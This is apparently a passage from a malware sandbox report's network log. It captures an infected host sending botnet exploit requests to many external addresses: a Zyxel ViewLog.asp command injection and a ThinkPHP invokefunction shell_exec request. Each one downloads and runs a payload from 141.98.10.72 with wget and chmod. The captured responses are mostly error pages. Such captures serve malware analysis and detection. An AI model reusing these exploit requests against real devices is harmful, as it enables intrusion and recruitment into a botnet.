                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:02.121160984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:03.369126081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:06.025229931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:11.144988060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:21.128480911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:41.863549948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821866035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.145394485.198.17.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:01.674797058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:02.053764105 CET139INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Cache-Control: private
                                                        Content-Length: 0
                                                        Date: Wed, 14 Feb 2024 12:03:01 GMT
                                                        Feb 14, 2024 09:33:04.004782915 CET139INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Cache-Control: private
                                                        Content-Length: 0
                                                        Date: Wed, 14 Feb 2024 12:03:01 GMT


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.145396285.198.17.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:02.426868916 CET139INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Cache-Control: private
                                                        Content-Length: 0
                                                        Date: Wed, 14 Feb 2024 12:03:02 GMT


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.1449246112.166.42.21280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:02.897027016 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:03.189776897 CET671INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                        Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19de


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.1449250112.166.42.21280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:03.489269018 CET489INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20
                                                        Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.19 19dec2003Date: Wed, 14 Feb 2024 17:33:03 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BOD


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.1448240112.197.182.9480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:03.552227020 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:03.918131113 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 15:33:03 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.1454610112.74.52.21380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:03.933346033 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:04.310764074 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.22.1
                                                        Date: Wed, 14 Feb 2024 08:33:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.145999294.120.210.1298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.320725918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.145570494.123.45.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.321166039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.144018494.122.86.1438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.322460890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.144149662.221.84.2488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.324229956 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.143905494.177.134.1708080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.516511917 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:04.712157011 CET1286INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.9
                                                        Mime-Version: 1.0
                                                        Date: Tue, 06 Apr 2021 05:28:22 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3161
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.145016694.156.203.1838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.523893118 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:04.728590965 CET198INHTTP/1.1 500 Internal Server Error
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:33:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 249958
                                                        Connection: close
                                                        ETag: "63f56696-3d066"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.143871262.29.3.1798080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.568978071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.1440862112.184.70.5280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:04.569453955 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:06.025118113 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:07.753077984 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:11.400789022 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:18.312556028 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
